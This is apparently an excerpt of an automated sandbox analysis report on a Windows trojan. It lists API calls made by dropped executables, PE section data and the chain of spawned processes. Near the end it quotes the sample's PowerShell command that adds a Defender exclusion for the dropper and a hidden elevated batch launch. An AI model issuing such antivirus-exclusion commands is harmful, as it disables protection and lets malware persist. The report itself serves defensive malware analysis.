              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A95B150 ZwUnsubscribeWnfStateChange,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91395E RtlAcquireSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93B944 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,RtlGetCurrentServiceSessionId,ZwSetTimer2,RtlGetCurrentServiceSessionId,ZwCancelTimer2,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91B171 ZwQueryDebugFilterState,_alloca_probe_16,memcpy,_vsnprintf,ZwWow64DebuggerCall,RtlRaiseException,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A1976 ZwCreateEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A95B160 ZwUpdateWnfStateData,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A95A160 ZwCreateWorkerFactory,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E8966 RtlGetCurrentServiceSessionId,ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9CBE9B RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94DE9E RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwUnsubscribeWnfStateChange,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A912E9F ZwCreateEvent,ZwClose,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A913E80 RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E3EBC ZwTraceControl,RtlNtStatusToDosError,RtlSetLastWin32Error,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93E6B0 RtlSetThreadWorkOnBehalfTicket,memcmp,ZwSetInformationThread,RtlSetThreadWorkOnBehalfTicket,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A2EA3 RtlGetCurrentServiceSessionId,ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A949ED0 RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlAcquireSRWLockShared,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,ZwWaitForAlertByThreadId,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9596D0 ZwCreateKey,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9166D4 RtlInitUnicodeString,ZwQueryValueKey,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E8ED6 RtlGetCurrentServiceSessionId,ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A912ED8 ZwWaitForAlertByThreadId,ZwWaitForAlertByThreadId,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9596C0 ZwSetInformationProcess,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A16FA ZwQueryWnfStateNameInformation,ZwUpdateWnfStateData,EtwEventWriteNoRegistration,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91B6F0 EtwEventWriteNoRegistration,ZwTraceEvent,RtlNtStatusToDosError,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A96DEF0 RtlRaiseException,RtlCaptureContext,ZwRaiseException,RtlRaiseStatus,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93E6F9 ZwAlpcSetInformation,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9596E0 ZwFreeVirtualMemory,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A2E14 RtlGetCurrentServiceSessionId,ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91C600 LdrQueryImageFileKeyOption,RtlInitUnicodeStringEx,ZwQueryValueKey,LdrQueryImageFileKeyOption,RtlFreeHeap,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap,RtlUnicodeStringToInteger,memcpy,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91B630 ZwWaitForKeyedEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9CFE3F memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959E30 ZwCancelWaitCompletionPacket,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959E20 ZwCancelTimer2,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E3E22 ZwTraceControl,RtlNtStatusToDosError,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A95B650 RtlUnhandledExceptionFilter,ZwTerminateProcess,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959650 ZwQueryValueKey,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A6652 ZwClose,RtlAllocateHeap,memcpy,ZwUnmapViewOfSection,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A95B640 RtlUnhandledExceptionFilter,ZwTerminateProcess,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A95AE70 ZwSetInformationWorkerFactory,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959670 ZwQueryInformationProcess,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94BE62 ZwProtectVirtualMemory,RtlGetCurrentTransaction,RtlGetCurrentTransaction,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A5780 DbgPrompt,ZwWow64DebuggerCall,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9C5F87 ZwUnmapViewOfSection,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A912FB0 RtlDestroyHeap,RtlDeleteCriticalSection,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlDestroyHeap,DbgPrint,DbgPrint,DbgPrint,RtlDebugPrintTimes,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,RtlGetCurrentServiceSessionId,ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9597A0 ZwUnmapViewOfSection,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A953FA0 RtlGetLocaleFileMappingAddress,ZwInitializeNlsFiles,RtlGetLocaleFileMappingAddress,ZwUnmapViewOfSection,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A95AFD0 ZwShutdownWorkerFactory,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94DFDF RtlWakeAddressAllNoFence,ZwAlertThreadByThreadId,RtlWakeAddressAllNoFence,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91F7C0 EtwNotificationUnregister,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwClose,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,EtwNotificationUnregister,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9597C0 ZwTerminateProcess,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A920FFD RtlInitUnicodeString,ZwQueryValueKey,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A0FEC ZwDuplicateObject,ZwDuplicateObject,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9437EB RtlImageNtHeader,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,ZwCreateIoCompletion,ZwCreateWorkerFactory,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwSetInformationWorkerFactory,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959710 ZwQueryInformationToken,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A6715 memset,memcpy,ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A949702 RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwReleaseWorkerFactoryWorker,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959730 ZwQueryVirtualMemory,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9CCF30 ZwAlertThreadByThreadId,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959750 ZwQueryInformationThread,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A5F5F RtlInitUnicodeString,ZwOpenFile,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlAllocateHeap,RtlInitUnicodeString,ZwQueryDirectoryFile,RtlAllocateHeap,memcpy,RtlFreeHeap,ZwClose,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959740 ZwOpenThreadToken,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A950F48 ZwOpenKey,ZwClose,ZwClose,ZwCreateKey,RtlInitUnicodeStringEx,ZwSetValueKey,RtlInitUnicodeStringEx,ZwSetValueKey,ZwClose,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94174B ZwFreeVirtualMemory,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959F70 ZwCreateIoCompletion,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959770 ZwSetInformationFile,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9CCF70 RtlpGetUserOrMachineUILanguage4NLS,RtlInitUnicodeString,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,ZwClose,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A916F60 RtlGetPersistedStateLocation,ZwOpenKey,memcpy,RtlGetPersistedStateLocation,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlAllocateHeap,ZwQueryValueKey,RtlExpandEnvironmentStrings,memcpy,ZwClose,ZwClose,RtlFreeHeap,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E8F6A RtlGetCurrentServiceSessionId,ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A95AF60 ZwSetTimer2,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A176C ZwOpenEvent,ZwWaitForSingleObject,ZwClose,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A993C93 wcschr,RtlInitUnicodeString,wcstoul,RtlAnsiStringToUnicodeString,RtlCompareUnicodeString,ZwProtectVirtualMemory,DbgPrintEx,RtlFreeUnicodeString,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4496 ZwAllocateVirtualMemory,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A95A480 ZwInitializeNlsFiles,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E9CB3 RtlGetCurrentServiceSessionId,ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E4CAB ZwTraceControl,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E8CD6 RtlGetCurrentServiceSessionId,ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A912CDB RtlFreeHeap,ZwClose,ZwSetEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D14FB memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9C64FB ZwOpenKey,ZwQueryValueKey,RtlEqualUnicodeString,RtlEqualUnicodeString,RtlEqualUnicodeString,ZwClose,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91F4E3 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A1CE4 ZwQueryInformationProcess,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A950413 ZwUnmapViewOfSection,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E8C14 RtlGetCurrentServiceSessionId,ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D1411 ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93FC39 ZwAssociateWaitCompletionPacket,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A95A420 ZwGetNlsSectionPtr,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A915450 RtlClearThreadWorkOnBehalfTicket,memcmp,RtlClearThreadWorkOnBehalfTicket,ZwSetInformationThread,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A1C49 ZwQueryInformationProcess,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959C40 ZwAllocateVirtualMemoryEx,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959C70 ZwAlpcConnectPort,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A955C70 TpSetPoolMaxThreadsSoftLimit,ZwSetInformationWorkerFactory,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E8C75 RtlGetCurrentServiceSessionId,ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A1C76 ZwQueryInformationProcess,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94AC7B ZwFreeVirtualMemory,RtlFillMemoryUlong,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,DbgPrint,DbgPrint,DbgPrint,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9C3C60 RtlFlushSecureMemoryCache,ZwQueryVirtualMemory,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93746D RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A913591 ZwSetInformationFile,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A92DD80 RtlAcquireSRWLockShared,ZwQueryVirtualMemory,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlRaiseStatus,RtlAddressInSectionTable,RtlImageDirectoryEntryToData,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9DB581 RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D1582 ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9595B0 ZwSetInformationThread,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959DB0 ZwAlpcSetInformation,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9165A0 RtlpGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwQueryLicenseValue,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetVersion,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959DA0 ZwAlpcSendWaitReceivePort,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9145D0 RtlGetThreadWorkOnBehalfTicket,RtlGetThreadWorkOnBehalfTicket,ZwQueryInformationThread,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9595D0 ZwClose,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9CFDD3 RtlGetCurrentServiceSessionId,ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A914DC0 RtlpUnWaitCriticalSection,RtlWakeAddressAllNoFence,RtlRaiseStatus,TpWaitForAlpcCompletion,RtlpUnWaitCriticalSection,ZwSetEvent,TpWaitForAlpcCompletion,ZwAlpcQueryInformation,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9595C0 ZwSetEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93EDC4 ZwCancelWaitCompletionPacket,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9195F0 TpSetPoolMinThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMinThreads,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9595F0 ZwQueryInformationFile,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9CBDFA RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959DE0 ZwAssociateWaitCompletionPacket,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A1D0B ZwSetInformationProcess,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E8D34 RtlGetCurrentServiceSessionId,ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A944D3B memset,RtlRunOnceExecuteOnce,ZwTraceControl,memcmp,RtlNtStatusToDosError,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A941520 RtlInitializeCriticalSectionEx,RtlInitializeCriticalSectionEx,RtlGetCurrentServiceSessionId,ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959520 ZwWaitForSingleObject,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9CFD22 ZwQueryInformationProcess,RtlUniform,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E1D55 ZwFreeVirtualMemory,RtlWakeAddressAllNoFence,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A1D43 ZwQueryInformationThread,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959D70 ZwAlpcQueryInformation,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A1570 ZwQuerySystemInformation,RtlInitUnicodeString,memset,ZwAlpcConnectPort,ZwAlpcSendWaitReceivePort,ZwClose,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A1D6A ZwWaitForMultipleObjects,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D6D61 ZwAllocateVirtualMemoryEx,
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeCode function: 23_2_028648D8 NtAllocateVirtualMemory,
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeCode function: 23_2_028648D0 NtAllocateVirtualMemory,
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeCode function: 28_2_00401915 Sleep,NtTerminateProcess,
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeCode function: 28_2_00402040 NtQuerySystemInformation,
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeCode function: 28_2_00402242 NtQuerySystemInformation,
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeCode function: 28_2_00402313 NtOpenKey,
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeCode function: 28_2_00401921 Sleep,NtTerminateProcess,
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeCode function: 28_2_00401931 Sleep,NtTerminateProcess,
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeCode function: 28_2_00402535 NtEnumerateKey,
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeCode function: 28_2_00401938 Sleep,NtTerminateProcess,
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeCode function: 28_2_00401FD8 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,NtQuerySystemInformation,NtQuerySystemInformation,
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeCode function: 28_2_00401FFE NtQuerySystemInformation,LocalAlloc,
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeCode function: 28_2_00402190 NtQuerySystemInformation,
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeCode function: 28_2_00401493 NtAllocateVirtualMemory,
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeCode function: 28_2_0040199B Sleep,NtTerminateProcess,
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeCode function: 28_2_004021B5 NtQuerySystemInformation,
              Source: CD0D.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: 3D1.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: B82B.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C1B2.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: 9C1A.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: fijbuft.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: 25Kf6vSBoq.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\irjbuftJump to behavior
              Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@44/20@59/8
              Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exeCode function: 27_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
              Source: 25Kf6vSBoq.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
              Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exeCode function: 27_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Users\user\Desktop\25Kf6vSBoq.exe 'C:\Users\user\Desktop\25Kf6vSBoq.exe'
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeProcess created: C:\Users\user\Desktop\25Kf6vSBoq.exe 'C:\Users\user\Desktop\25Kf6vSBoq.exe'
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6EC5.exe C:\Users\user~1\AppData\Local\Temp\6EC5.exe
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\irjbuft C:\Users\user\AppData\Roaming\irjbuft
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeProcess created: C:\Users\user\AppData\Local\Temp\6EC5.exe C:\Users\user~1\AppData\Local\Temp\6EC5.exe
              Source: C:\Users\user\AppData\Roaming\irjbuftProcess created: C:\Users\user\AppData\Roaming\irjbuft C:\Users\user\AppData\Roaming\irjbuft
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B82B.exe C:\Users\user~1\AppData\Local\Temp\B82B.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\C1B2.exe C:\Users\user~1\AppData\Local\Temp\C1B2.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\CD0D.exe C:\Users\user~1\AppData\Local\Temp\CD0D.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DF9C.exe C:\Users\user~1\AppData\Local\Temp\DF9C.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\EA8A.exe C:\Users\user~1\AppData\Local\Temp\EA8A.exe
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess created: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F4BC.exe C:\Users\user~1\AppData\Local\Temp\F4BC.exe
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeProcess created: C:\Users\user\AppData\Local\Temp\DF9C.exe DF9C.exe
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\irjbuft C:\Users\user\AppData\Roaming\irjbuft
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3D1.exe C:\Users\user~1\AppData\Local\Temp\3D1.exe
              Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe' /SpecialRun 4101d8 6864
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DF9C.exe 'C:\Users\user~1\AppData\Local\Temp\DF9C.exe'
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\B82B.exe' -Force
